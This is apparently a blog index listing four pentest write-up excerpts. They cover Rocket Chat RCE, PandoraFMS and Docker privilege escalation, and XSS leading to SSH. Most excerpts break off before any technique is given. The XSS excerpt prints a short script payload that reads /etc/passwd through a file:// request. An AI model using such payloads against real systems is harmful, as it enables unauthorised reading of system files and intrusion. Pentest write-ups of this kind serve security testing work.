Pentest Rocket Chat RCE + docker VM PoC read any root file (PRIV esc) shocker

Mohad Pentest July 18, 2022
affected script is Rocket Chat official site : https://rocket.chat/   Situation : log in as mod or admin. after login in go to INTEGRATION      choose the active channel ( my case was GENERAL …
Read More

Pentest PandoraFMS Backup Utility root priv escalation

Mohad Pentest July 18, 2022
Situation: reverse shell or ssh connection.   official site : https://pandorafms.com/manual/en/ation/05_big_environments/07_server_management   executing command : /usr/bin/pandora_backup   show we have no permission. reading the backup script it shows that depends on tar, so i created…
Read More

Pentest Docker Engine priv escalation

Mohad Pentest July 18, 2022
Situation: ssh user with docker priv. docker installed. ubuntu server   usually normal docker usage is : docker run hello-world This command downloads a test image and runs it in a container. When the container…
Read More

Pentest XSS Attack To SSH

Mohad Pentest July 18, 2022
Situation :  Admin Panel infected with xss and uploading any file converted to pdf.   P0c from (https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html): <script> x=new XMLHttpRequest; x.onload=function() { document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>   Explaining it in images: Next Download…
Read More